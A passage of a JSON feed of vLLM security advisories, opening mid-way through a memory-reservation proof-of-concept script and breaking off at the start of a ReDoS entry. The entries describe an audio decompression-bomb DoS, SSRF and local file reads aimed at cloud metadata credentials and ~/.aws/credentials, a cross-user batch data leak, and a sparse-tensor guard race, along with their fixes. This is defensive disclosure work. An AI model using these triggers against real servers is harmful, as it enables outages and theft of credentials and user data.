uses_pynv_static(static_media_io_kwargs, env_backend) else 0\n    return raw_frame_reserved_bytes + decoder_reserved_bytes\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--repo\", required=True, type=Path)\nrepo = parser.parse_args().repo.resolve()\n\nmedia_video = read(repo, \"vllm/multimodal/media/video.py\")\nconnector = read(repo, \"vllm/multimodal/media/connector.py\")\nchat_protocol = read(repo, \"vllm/entrypoints/openai/chat_completion/protocol.py\")\nresponses_protocol = read(repo, \"vllm/entrypoints/openai/responses/protocol.py\")\ngpu_worker = read(repo, \"vllm/v1/worker/gpu_worker.py\")\nvideo_core = read(repo, \"vllm/multimodal/video.py\")\n\nassert \"media_io_kwargs: dict[str, dict[str, Any]] | None = Field(\" in chat_protocol\nassert \"media_io_kwargs: dict[str, dict[str, Any]] | None = Field(\" in responses_protocol\nassert 'video_io_kwargs = dict(self.media_io_kwargs.get(\"video\", {}))' in connector\nassert 'if \"video_backend\" not in video_io_kwargs and (' in connector\nassert 'kwargs.pop(\"video_backend\", None) or envs.VLLM_VIDEO_LOADER_BACKEND' in media_video\nassert \"elif backend == PYNVVIDEOCODEC_VIDEO_BACKEND:\" in video_core\nassert 'video_kwargs = mm_config.media_io_kwargs.get(\"video\", {})' in gpu_worker\n\ndecoder_bytes = const_int(video_core, \"PYNVVIDEOCODEC_DECODER_GPU_MEMORY_BYTES\")\nretained_decoders = const_int(video_core, \"PYNVVIDEOCODEC_MAX_RETAINED_DECODERS\")\ncuda_context_bytes = const_int(video_core, \"PYNVVIDEOCODEC_CUDA_CONTEXT_BYTES\")\nper_server_decoder_bytes = decoder_bytes * retained_decoders + cuda_context_bytes\n\nvulnerable_static_reserved = reserve_bytes({}, \"opencv\", 0.0, decoder_bytes, cuda_context_bytes, retained_decoders)\nnegative_control_reserved = reserve_bytes({\"video\": {\"video_backend\": \"pynvvideocodec\"}}, \"opencv\", 0.0, decoder_bytes, cuda_context_bytes, retained_decoders)\nraw_frame_only_control = reserve_bytes({}, \"opencv\", 0.25, decoder_bytes, cuda_context_bytes, retained_decoders)\n\nhead = subprocess.check_output([\"git\", \"-C\", str(repo), \"rev-parse\", \"HEAD\"], text=True).strip()\nprint(json.dumps({\n    \"head\": head,\n    \"vulnerable\": vulnerable_static_reserved == 0 and negative_control_reserved == per_server_decoder_bytes,\n    \"reservation_simulation\": {\n        \"env_video_loader_backend\": \"opencv\",\n        \"request_selects_pynv_after_startup\": True,\n        \"vulnerable_static_reserved_bytes\": vulnerable_static_reserved,\n        \"negative_control_static_pynv_reserved_bytes\": negative_control_reserved,\n        \"raw_frame_only_control_reserved_bytes\": raw_frame_only_control,\n        \"unreserved_decoder_bytes_when_only_request_selects_pynv\": per_server_decoder_bytes,\n    },\n}, indent=2, sort_keys=True))\n```","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-09-17T17:17:39.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","references":["https://github.com/vllm-project/vllm/security/advisories/GHSA-8pw2-6jv3-mj5j","https://nvd.nist.gov/vuln/detail/CVE-2026-69147","https://github.com/vllm-project/vllm/pull/47259","https://github.com/vllm-project/vllm/commit/283893c72292ede38d277e3cd2b9b64c3e4f1dda","https://github.com/vllm-project/vllm/commit/ba22152096b2484faa3579624a253d54804d876d","https://github.com/vllm-project/vllm/releases/tag/v0.25.0","https://github.com/advisories/GHSA-8pw2-6jv3-mj5j"],"source_kind":"github","identifiers":["GHSA-8pw2-6jv3-mj5j","CVE-2026-69147"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-09-17T18:00:08.816Z","updated_at":"2026-09-28T20:00:22.654Z","epss_percentage":0.00548,"epss_percentile":0.43528,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04cHcyLTZqdjMtbWo1as4AB5OW","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS04cHcyLTZqdjMtbWo1as4AB5OW","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.28.0","vulnerable_version_range":"\u003c 0.28.0"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04cHcyLTZqdjMtbWo1as4AB5OW/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1oY3dxLTh3amYtM2djcs4AB27I","url":"https://github.com/advisories/GHSA-hcwq-8wjf-3gcr","title":"vLLM: Unauthenticated audio decompression-bomb DoS in /v1/chat/completions","description":"### Summary\nThe audio decode-duration guard (`max_duration_s`, env `VLLM_MAX_AUDIO_DECODE_DURATION_S`, default 600s) that protects against audio decompression-bomb DoS is wired into **only** the speech-to-text path (`/v1/audio/transcriptions`). The **chat** audio path (`/v1/chat/completions`, `input_audio` content parts) calls the same decoder with **no** limit, so an **unauthenticated** client can submit a few-KB compressed audio file that expands to multiple GB of float32 PCM at decode time, OOM-killing the worker. This is a distinct sibling of **CVE-2026-5497** (video frame-count bomb, `VideoMediaIO.load_base64`) and **GHSA-pq5c-rjhq-qp7p** (image) in the same media subsystem.\n\nVerified against `main` at HEAD `d78650c` (2026-06-16); applicable to the latest release v0.23.0.\n\n### Details\nThe guard rejects long audio *during* decode (before allocation), implemented in `vllm/multimodal/media/audio.py`:\n- `load_audio_pyav` — metadata reject (~82-98) and live sample-count reject (~129-136)\n- `load_audio_soundfile` — frames reject (~165-174)\n\nAll are gated on `if max_duration_s is not None`.\n\nIt is passed in exactly **one** place — the transcription serving layer:\n```python\n# .../speech_to_text/base/serving.py:~170-174\nload_audio(buf, sr=..., max_duration_s=self.max_audio_decode_duration_s)\n#   self.max_audio_decode_duration_s = envs.VLLM_MAX_AUDIO_DECODE_DURATION_S  (default 600)\n```\n\nThe chat path never threads it:\n```python\n# vllm/multimodal/media/audio.py:237-238\ndef load_bytes(self, data: bytes) -\u003e tuple[npt.NDArray, float]:\n    return load_audio(BytesIO(data), sr=None)   # no max_duration_s -\u003e every guard above is skipped\n```\n\nUnauthenticated reachability chain (chat):\n`parse_input_audio` (`chat_utils.py`) -\u003e `parse_audio` -\u003e `connector.fetch_audio` -\u003e `AudioMediaIO._load_data_url` -\u003e `load_base64` -\u003e `load_bytes` -\u003e `load_audio(..., sr=None)`. The connector never passes `max_duration_s`, and inline `data:` URLs need no HTTP fetch (so `VLLM_AUDIO_FETCH_TIMEOUT` does not bound them). The OpenAI-compatible server has no auth by default (auth only when `--api-key` / `VLLM_API_KEY` is set).\n\n### Impact\nUnauthenticated remote denial of service (availability) via memory amplification on a default-no-auth endpoint, on any deployment serving an audio-capable model. Same class and impact as the sibling CVE-2026-5497 (video). CWE-770 / CWE-409.\n\n### Fix\nA fix was introduced in this MR: https://github.com/vllm-project/vllm/pull/45908","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-09-16T22:12:17.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","references":["https://github.com/vllm-project/vllm/security/advisories/GHSA-hcwq-8wjf-3gcr","https://nvd.nist.gov/vuln/detail/CVE-2026-57173","https://github.com/vllm-project/vllm/pull/45908","https://github.com/vllm-project/vllm/commit/3d20275bb4d434f53055c3c0b645fd8bb072965e","https://github.com/vllm-project/vllm/releases/tag/v0.24.0","https://github.com/advisories/GHSA-hcwq-8wjf-3gcr"],"source_kind":"github","identifiers":["GHSA-hcwq-8wjf-3gcr","CVE-2026-57173"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-09-16T23:00:08.881Z","updated_at":"2026-09-25T12:00:25.653Z","epss_percentage":0.00687,"epss_percentile":0.5057,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1oY3dxLTh3amYtM2djcs4AB27I","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1oY3dxLTh3amYtM2djcs4AB27I","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.24.0","vulnerable_version_range":"\u003c= 0.23.0"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1oY3dxLTh3amYtM2djcs4AB27I/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS00aGhwLWg2NmYtajVqN84ABu8g","url":"https://github.com/advisories/GHSA-4hhp-h66f-j5j7","title":"vLLM: SSRF + arbitrary local file read in MiMoV2OmniMultiModalProcessor `_fetch_image` and audio loader bypass MediaConnector protections","description":"### Summary\n\n`vllm/transformers_utils/processors/mimo_v2_omni.py` — the multimodal processor for `MiMoV2OmniForCausalLM` — issues `requests.get(...)` directly on user-supplied image and audio URL strings and `Image.open(...)` on user-supplied local paths, **without** the SSRF / `allowed_local_media_path` checks that `vllm.multimodal.utils.MediaConnector` was hardened with in **GHSA-qh4c-xf7m-gxfc**, **GHSA-v359-jj2v-j536**, and **GHSA-pf3h-qjgv-vcpr**.\n\nThis is the same bug class as those three published advisories, in a code path the patches missed. When a user passes a URL or local-file string through `multi_modal_data` (e.g. `LLM.generate(multi_modal_data={\"image\": \"http://...\"})`), the processor takes the unsanitized string and dispatches it without any URL-scheme allowlist, network-target allowlist, size cap, or local-path allowlist.\n\n### Details\n\n**File:** `vllm/transformers_utils/processors/mimo_v2_omni.py` (current `main`)\n\n**Sink 1 — image SSRF + local-file read (`_fetch_image`, lines 231–249):**\n\n```python\ndef _fetch_image(src: Any) -\u003e Image.Image:\n    if isinstance(src, Image.Image):\n        return _to_rgb(src)\n    if isinstance(src, bytes):\n        return _to_rgb(copy.deepcopy(Image.open(BytesIO(src))))\n    if isinstance(src, str):\n        if src.startswith((\"http://\", \"https://\")):\n            r = requests.get(src, timeout=30)              # SSRF: no allowlist, follows redirects\n            r.raise_for_status()\n            return _to_rgb(copy.deepcopy(Image.open(BytesIO(r.content))))\n        if src.startswith(\"file://\"):\n            return _to_rgb(Image.open(src[7:]))            # arbitrary local file read\n        if src.startswith(\"data:image\"):\n            ...\n        return _to_rgb(Image.open(src))                    # fallback also opens local files\n    raise ValueError(f\"Unrecognized image source: {type(src)}\")\n```\n\n**Sink 2 — audio SSRF (around line 471):**\n\n```python\nelif audio.startswith((\"http://\", \"https://\")):\n    r = requests.get(audio, timeout=30)                    # SSRF: same pattern\n    r.raise_for_status()\n    file_obj = io.BytesIO(r.content)\n```\n\n**Reachability.** `_fetch_image` is invoked from `MiMoVLProcessor.process_image`:\n\n```python\ndef process_image(self, image: ImageInput) -\u003e torch.Tensor:\n    kw = self._resolve_img_kw(image)\n    src = image.image\n    if isinstance(src, (str, bytes)):\n        src = _fetch_image(src)\n    ...\n```\n\n`MiMoVLProcessor` is wrapped by `MiMoV2OmniMultiModalProcessor` and registered for the `MiMoV2OmniForCausalLM` model architecture (`vllm/model_executor/models/mimo_v2_omni.py:1169`). Whenever a user passes a string into `multi_modal_data[\"image\"]` (or `[\"audio\"]`) for this model, the unsanitized URL/path reaches the sink.\n\n**Comparison to the recent fixes.** The remediation pattern adopted in the three earlier advisories was to route every external resource fetch through `MediaConnector`, which checks `allowed_local_media_path` and applies SSRF protection before issuing the network request. `chat_utils.py` (lines 838, 902, 924, 963, 1053, 1081) already uses `self._connector.fetch_image / fetch_audio / fetch_video`. The model processor in `mimo_v2_omni.py` was added later and skipped the connector — it calls `requests.get` and `Image.open` directly. Result: the public OpenAI chat-completion path is protected, but library use (`LLM.generate(multi_modal_data=...)`), batch processing, and any other path that lets a string reach the processor receive no protection.\n\n### Impact\n\n1. **SSRF — internal-network probing / cloud-metadata theft.** Standard `requests.get` follows redirects and accepts any URL. An attacker who controls a `multi_modal_data` value can:\n   - read AWS / GCP / Azure instance metadata (e.g. `http://169.254.169.254/latest/meta-data/iam/security-credentials/`),\n   - probe internal services on the vLLM host (`http://127.0.0.1:\u003cport\u003e`, `http://10.x.y.z`),\n   - exfiltrate via DNS / HTTP timing oracles even when the body is rejected by `Image.open`.\n2. **Arbitrary local file read** via `file://path` (line 242) and the unguarded fallback `Image.open(src)` (line 248). Any file readable by the vLLM process is reachable through the model pipeline; with suitable formats this exposes `/etc/passwd`, `~/.aws/credentials`, etc.\n3. **Server-side traffic generation / amplification** by hammering arbitrary URLs from the vLLM host, with a 30-second timeout per request.\n\n### Suggested remediation\n\nReplace direct `requests.get` and bare `Image.open` paths with `MediaConnector.fetch_image` / `fetch_audio_async` (or pass the inputs through `MediaConnector` before they reach the processor):\n\n```python\n# vllm/transformers_utils/processors/mimo_v2_omni.py\nfrom vllm.multimodal.utils import MediaConnector\n\n_connector = MediaConnector()\n\ndef _fetch_image(src):\n    if isinstance(src, Image.Image):\n        return _to_rgb(src)\n    if isinstance(src, bytes):\n        return _to_rgb(copy.deepcopy(Image.open(BytesIO(src))))\n    if isinstance(src, str):\n        return _to_rgb(_connector.fetch_image(src))   # delegates to the hardened path\n    raise ValueError(f\"Unrecognized image source: {type(src)}\")\n```\n\nSame change for the audio loader at line 471. This re-uses the SSRF allowlist, `allowed_local_media_path` policy, and size caps that the previous patches added.\n\nAlternative: forbid `str` `src` from reaching the processor and require all multi-modal pre-processing to go through `chat_utils.py` / `MediaConnector` before hitting the model. Larger surface change, but completes the architectural fix.\n\n### Discovery\n\nStatic review on `vllm@main` (HEAD as of 2026-04-30) — found by triaging the file list against the three recent SSRF advisories: the `mimo_v2_omni.py` processor, added after those fixes, reintroduced the same bypass class.\n\n### Reporter\n\nIevgen Bondarenko — `sactransport2000@gmail.com` — GitHub `@ibondarenko1`","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-09-08T20:42:00.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N","references":["https://github.com/vllm-project/vllm/security/advisories/GHSA-4hhp-h66f-j5j7","https://nvd.nist.gov/vuln/detail/CVE-2026-73560","https://github.com/vllm-project/vllm/pull/43117","https://github.com/vllm-project/vllm/commit/54503ecec0f3ac31e5ecfc5f28652e4cc42307b5","https://github.com/vllm-project/vllm/releases/tag/v0.26.0","https://github.com/advisories/GHSA-4hhp-h66f-j5j7"],"source_kind":"github","identifiers":["GHSA-4hhp-h66f-j5j7","CVE-2026-73560"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-09-08T21:00:09.189Z","updated_at":"2026-10-02T15:00:42.495Z","epss_percentage":0.00407,"epss_percentile":0.3255,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS00aGhwLWg2NmYtajVqN84ABu8g","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS00aGhwLWg2NmYtajVqN84ABu8g","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.26.0","vulnerable_version_range":"\u003c 0.26.0"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS00aGhwLWg2NmYtajVqN84ABu8g/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS03bTZoLXg5NXgtODJxNc4ABu8V","url":"https://github.com/advisories/GHSA-7m6h-x95x-82q5","title":"vLLM: Cross-User Data Leak Vulnerability","description":"### Summary\nAn integer overflow in the act_and_mul_kernel kernel can cause the output of one user request to be incorporated into the response of another request within the same inference batch. Under certain conditions, the last request in a batch can receive a partial or complete copy of the first user's inference result, resulting in cross-user data leakage.\n\n\n### Details\nThe root cause is an integer overflow in the expression blockIdx.x * 2 * d at https://github.com/vllm-project/vllm/blob/ff712f6447093d07747c88680b9d006b119f5890/csrc/activation_kernels.cu#L82. \n\nAs a result, the computation for one user (User A) can incorrectly consume input data from another user (User B). In particular, when 2^32 is divisible by d, the overflow can cause User A's output to contain portions of User B's inference result. In some cases, User B's response may be copied entirely into User A's response.\n\nThis constitutes a severe cross-user information disclosure vulnerability and is straightforward to trigger.\n### PoC\nWe reproduced the issue using meta-llama/Llama-3.2-1B-Instruct, for which d = 8192.\n\nUsing the following configuration:\n\nBatch size: 17\nSequence length: 16384\n\nThe final response in the batch becomes an exact copy of the first response in the batch, demonstrating complete cross-user data leakage.\n\n### Impact\nThis vulnerability enables cross-user information disclosure. An attacker can intentionally craft requests that are processed within the same inference batch as a victim's request and cause the victim's inference output to be copied into the attacker's response.\n\nAs a result, sensitive information contained in another user's model response may be exposed to an unauthorized party.\n\n### Versions\n\nFor versions prior and equal to 0.21.0, the bug is in csrc/activation_kernels.cu, and for versions later than 0.21.0, the bug is in csrc/libtorch_stable/activation_kernels.cu.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-09-08T20:24:49.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.3,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N","references":["https://github.com/vllm-project/vllm/security/advisories/GHSA-7m6h-x95x-82q5","https://nvd.nist.gov/vuln/detail/CVE-2026-73558","https://github.com/vllm-project/vllm/issues/42860","https://github.com/vllm-project/vllm/pull/49660","https://github.com/vllm-project/vllm/commit/451227cb3ff07989698fed982c2d3e4300257924","https://github.com/vllm-project/vllm/releases/tag/v0.27.0","https://github.com/advisories/GHSA-7m6h-x95x-82q5"],"source_kind":"github","identifiers":["GHSA-7m6h-x95x-82q5","CVE-2026-73558"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-09-08T21:00:09.194Z","updated_at":"2026-09-30T09:00:38.957Z","epss_percentage":0.00414,"epss_percentile":0.33156,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03bTZoLXg5NXgtODJxNc4ABu8V","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS03bTZoLXg5NXgtODJxNc4ABu8V","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.27.0","vulnerable_version_range":"\u003c 0.27.0"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03bTZoLXg5NXgtODJxNc4ABu8V/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1wcjdmLXA1bXctZmM4N84ABsdw","url":"https://github.com/advisories/GHSA-pr7f-p5mw-fc87","title":" vLLM: Incomplete CVE-2025-62164 remediation can be bypassed by concurrent prompt parts","description":"## Executive Summary\n\nThe follow-up protection for CVE-2025-62164 is incomplete at vLLM revision `26587f9519e22a5c4549ead7595ad9ca3229c4fd`. It wraps serialized prompt-embedding reconstruction and dense conversion in `torch.sparse.check_sparse_tensor_invariants()`, but PyTorch 2.11.0 implements that context with save/enable/restore operations over process-global state. Two prompt-embedding parts in one `/v1/chat/completions` request are gathered concurrently on the event loop's default executor. When one context exits before the other loads its tensor, it can restore the global flag to `False` while the second part remains inside its guard.\n\nIn a deterministic run against hash-verified source from the affected revision, the actual target loader rejected an invalid sparse payload as a negative control. The frozen chat tracker then scheduled benign and malicious parts on distinct `asyncio_0` and `asyncio_1` threads. The benign context exited, the malicious loader observed the invariant flag disabled, and `torch.load(weights_only=True)` reconstructed indices `[[10], [10]]` for a declared shape of `[3, 3]`. The run intercepted the target's `to_dense()` call before it operated on the invalid tensor.\n\nThis primary trigger requires `--enable-prompt-embeds`, which is default-off, but it does **not** require `renderer_num_workers \u003e 1`, a multimodal model, or `--enable-mm-embeds`. API authentication is optional in the stock server: middleware is installed only when CLI or environment API keys are supplied.\n\nThe lab proves bypass of the follow-up guard, invalid sparse reconstruction, and guarded-sink reachability. Crash and memory-corruption consequences are conditional on the behavior documented by the published CVE.\n\n## Background\n\nCVE-2025-62164 / [GHSA-mrw7-hf4f-83pf](https://github.com/vllm-project/vllm/security/advisories/GHSA-mrw7-hf4f-83pf) concerns client-controlled serialized `prompt_embeds` reaching `torch.load(weights_only=True)` and an invalid sparse tensor reaching `to_dense()`. The advisory attributes memory corruption, denial of service, and potential code execution to that historical unsafe operation.\n\nThe remediation chronology matters for duplicate handling:\n\n- PR [#27204](https://github.com/vllm-project/vllm/pull/27204), merge commit [`58fab50d82838d5014f4a14d991fdb9352c9c84b`](https://github.com/vllm-project/vllm/commit/58fab50d82838d5014f4a14d991fdb9352c9c84b) on 2025-10-22, introduced the default-off `enable_prompt_embeds` gate. It did not add the sparse-invariant context.\n- Commit [`84e23d103d3483f944780d0d42bcf0993fd27e3a`](https://github.com/vllm-project/vllm/commit/84e23d103d3483f944780d0d42bcf0993fd27e3a) on 2025-12-15, titled `additional protection for CVE-2025-62164 (#30649)`, added the process-global sparse-invariant context around load, type check, and dense conversion.\n- Refactor commit [`f0a1c8453ad1c664c8a04c83fe545195fcd556eb`](https://github.com/vllm-project/vllm/commit/f0a1c8453ad1c664c8a04c83fe545195fcd556eb) on 2026-01-31 moved the guarded loader into `vllm/renderers/embed_utils.py` while preserving the same context.\n- Chat content-part commit [`14043dfecd35dd2f12b4d51eb9fa166184a0ca0f`](https://github.com/vllm-project/vllm/commit/14043dfecd35dd2f12b4d51eb9fa166184a0ca0f) on 2026-05-01 introduced `prompt_embeds` chat parts and the concurrent one-request schedule described here.\n\nThis report therefore does not present the malformed sparse payload or `to_dense()` sink as new. It reports a distinct concurrency root cause and trigger: unsynchronized save/enable/restore of the process-global follow-up guard, reachable through the later multi-part chat scheduler.\n\nThe affected revision pins PyTorch 2.11.0 in `pyproject.toml:10`.\n\n## Vulnerability Details\n\nThe target's `safe_load_prompt_embeds` performs the guarded operation in `vllm/renderers/embed_utils.py:16-39`:\n\n```python\nwith torch.sparse.check_sparse_tensor_invariants():\n    tensor = torch.load(\n        BytesIO(pybase64.b64decode(embed, validate=True)),\n        weights_only=True,\n        map_location=torch.device(\"cpu\"),\n    )\n    if not isinstance(tensor, torch.Tensor):\n        raise VLLMValidationError(...)\n    tensor = tensor.to_dense()\n```\n\nThe context is not request-local. With the global flag initially disabled, we can describe the verified interleaving:\n\n1. Benign part A enters, saves `False`, and enables the flag.\n2. Malicious part B enters, saves `True`, and leaves the flag enabled.\n3. A completes its load and exits, restoring its saved `False` value.\n4. B remains lexically inside its context but observes the actual global flag as `False`.\n5. B's `torch.load(..., weights_only=True)` reconstructs the malformed sparse tensor.\n6. The target reaches `tensor.to_dense()` before later rank, hidden-size, and dtype checks.\n\n`weights_only=True` constrains deserialization types; it does not compensate for a sparse invariant check that another request has disabled.\n\nThe complete stock actor-to-sink chain, traced in the affected source, is:\n\n`POST /v1/chat/completions` (`vllm/entrypoints/openai/chat_completion/api_router.py:41-61`) -\u003e `OpenAIServingChat.create_chat_completion` -\u003e `_create_chat_completion` -\u003e `render_chat_request` (`vllm/entrypoints/openai/chat_completion/serving.py:206-280`) -\u003e `OnlineRenderer.render_chat` (`vllm/renderers/online_renderer.py:95-190`) -\u003e `preprocess_chat` (`vllm/renderers/online_renderer.py:335-380`) -\u003e `BaseRenderer.render_chat_async` (`vllm/renderers/base.py:1070-1105`) -\u003e `HfRenderer.render_messages_async` (`vllm/renderers/hf.py:1049-1085`) -\u003e `parse_chat_messages_async` (`vllm/entrypoints/chat_utils.py:1911-1945`) -\u003e content-part `parse_prompt_embeds` and `_load_prompt_embeds_async` (`vllm/entrypoints/chat_utils.py:1099-1120`) -\u003e `AsyncMultiModalItemTracker.resolve_items` (`vllm/entrypoints/chat_utils.py:818-835`) -\u003e `asyncio.gather` of both prompt parts -\u003e `safe_load_prompt_embeds_async` -\u003e `make_async` -\u003e `loop.run_in_executor(executor=None, ...)` (`vllm/utils/async_utils.py:28-45`) -\u003e guarded `torch.load` -\u003e `to_dense()`.\n\nThe prompt async helper is created without an explicit executor, so it uses the event loop's default executor. This path is separate from the renderer's configurable pool. The deterministic scheduler run observed the two parts on distinct default-executor threads while leaving `renderer_num_workers` at its default of one.\n\n`prompt_embeds` bypasses multimodal processing, and the tracker explicitly permits it when `is_multimodal_model=False` (`vllm/entrypoints/chat_utils.py:793-837`). Consequently, the primary trigger needs neither a multimodal model nor `enable_mm_embeds`.\n\nThe source also states that async wrappers must be thread-safe (`vllm/utils/async_utils.py:28-38`), while a target test acknowledges that the sparse flag is not thread-local and concurrent users can leak state (`tests/renderers/test_sparse_tensor_validation.py:58-61`).\n\n## Exploitability Analysis\n\nThe following evidence labels separate what was demonstrated from what remains conditional:\n\n| Label | Claim |\n| --- | --- |\n| **Verified by run** | PyTorch 2.11.0 rejects the identical invalid payload through the actual target loader without the race. |\n| **Verified by run** | The hash-verified frozen tracker schedules two prompt parts on distinct default-executor threads, races the flag to `False`, reconstructs the invalid sparse tensor, and reaches the target `to_dense()` call while the interception prevents execution. |\n| **Traced in source** | A client can supply multiple `prompt_embeds` content parts through the stock `/v1/chat/completions` route and the function chain above. |\n| **Traced in source** | `enable_prompt_embeds` defaults to `False` (`vllm/config/model.py:255-260`), so the operator must opt in. `enable_mm_embeds` and non-default renderer workers are not preconditions for this path. |\n| **Traced in source** | `api_key` defaults to `None` (`vllm/entrypoints/openai/cli_args.py:264`), and authentication middleware is installed only when a CLI or environment key is present (`vllm/entrypoints/openai/api_server.py:306-310`). With a configured key, the attacker must authenticate; without one, the stock route has no API-key middleware. |\n| **Unrun** | A live HTTP/GPU server, real-world race win rate, unsafe dense conversion, process crash, memory corruption, and reliable code execution. |\n\nThe feature is documented for trusted users, which narrows intended exposure. It is not a memory-safety boundary: a user authorized to submit embedding inputs should not be able to disable a process-wide invariant for concurrent work.\n\nThe current run proves the same invalid sparse object can cross the guard and reach the historical sink. If executing that sink retains the behavior described in CVE-2025-62164 for the deployed PyTorch build, denial of service or memory corruption may follow. This is a conditional impact statement, not a reproduced outcome. Reliable RCE is not claimed.\n\nThe opt-in feature, scheduling requirement, and absence of a measured live win rate support **Medium/P2** despite the serious historical sink class. No additional deployment assumptions are required for the one-request scheduler beyond stock default-executor concurrency being available.\n\n## Remediation\n\nThe immediate fix is one shared process-wide lock around every use of this process-global sparse guard. The lock must cover invariant enabling, deserialization, tensor type validation, and dense conversion:\n\n```python\nwith shared_sparse_load_lock:\n    with torch.sparse.check_sparse_tensor_invariants():\n        tensor = torch.load(..., weights_only=True, map_location=\"cpu\")\n        validate_tensor_type(tensor)\n        tensor = tensor.to_dense()\n```\n\nEvery prompt, image, and audio loader that manipulates the same global flag must use the same lock. A lock only around `torch.load`, separate per-loader locks, or a lock omitted from the chat helper would leave overlapping save/restore sequences possible.\n\nThe stronger design is to avoid mutable process-global validation state in concurrent request code. Prefer a PyTorch per-call invariant check if one is available, or reconstruct and validate serialized embeddings inside a deliberately serialized boundary before any sparse operation.\n\nRegression coverage should:\n\n- Preserve the actual-target negative control using the identical malformed payload.\n- Force A-enter, B-enter, A-exit, B-load and assert B remains protected.\n- Execute the multi-part chat tracker with the event loop's default executor and `renderer_num_workers=1`.\n- Cover cross-loader overlap so later prompt, image, or audio changes cannot bypass a shared fix.\n- Assert the global flag is restored after success and exceptions.\n- Reject invalid tensors before any dense conversion.\n\nUntil a fix is deployed, leaving `enable_prompt_embeds` disabled removes this stock source path.\n\n## Summary\n\nThe affected vLLM revision uses a process-global PyTorch context as the follow-up protection for CVE-2025-62164. A later chat feature causes two prompt-embedding parts from one request to run concurrently on the default executor. One context can restore the flag to `False` while the other is still guarded, allowing the historical malformed sparse payload class to reach the historical `to_dense()` sink. The new issue is the concurrent guard bypass and shipped trigger, not the payload or sink. Runtime validation proves the bypass and safe sink reachability on PyTorch 2.11.0; historical crash and memory-corruption effects remain conditional, and RCE was not tested or claimed.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-09-04T21:39:02.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.3,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N","references":["https://github.com/vllm-project/vllm/security/advisories/GHSA-pr7f-p5mw-fc87","https://nvd.nist.gov/vuln/detail/CVE-2026-73557","https://github.com/vllm-project/vllm/pull/48583","https://github.com/vllm-project/vllm/commit/793cf79c89d4049124e756915468ac30318f2e50","https://github.com/vllm-project/vllm/releases/tag/v0.26.0","https://github.com/advisories/GHSA-pr7f-p5mw-fc87"],"source_kind":"github","identifiers":["GHSA-pr7f-p5mw-fc87","CVE-2026-73557"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-09-04T22:00:09.641Z","updated_at":"2026-09-25T12:00:36.809Z","epss_percentage":0.00404,"epss_percentile":0.31871,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1wcjdmLXA1bXctZmM4N84ABsdw","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1wcjdmLXA1bXctZmM4N84ABsdw","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.26.0","vulnerable_version_range":"\u003e= 0.21.0, \u003c 0.26.0"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1wcjdmLXA1bXctZmM4N84ABsdw/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS00OGpoLTNnajctZmc4ds4ABsdv","url":"https://github.com/advisories/GHSA-48jh-3gj7-fg8v","title":"vLLM: ReDoS via structured_outputs.regex in the lm-format-enforcer backend (no compile timeout) — missed sibling of GHSA-rwxx-mrjm-wc2m","description":"### Summary\n\nThe fix for `GHSA-rwxx-mrjm-wc2m` (\"ReDoS via `structured_outputs.regex` compiled without timeout\") wrapped the regex compile in the **xgrammar** 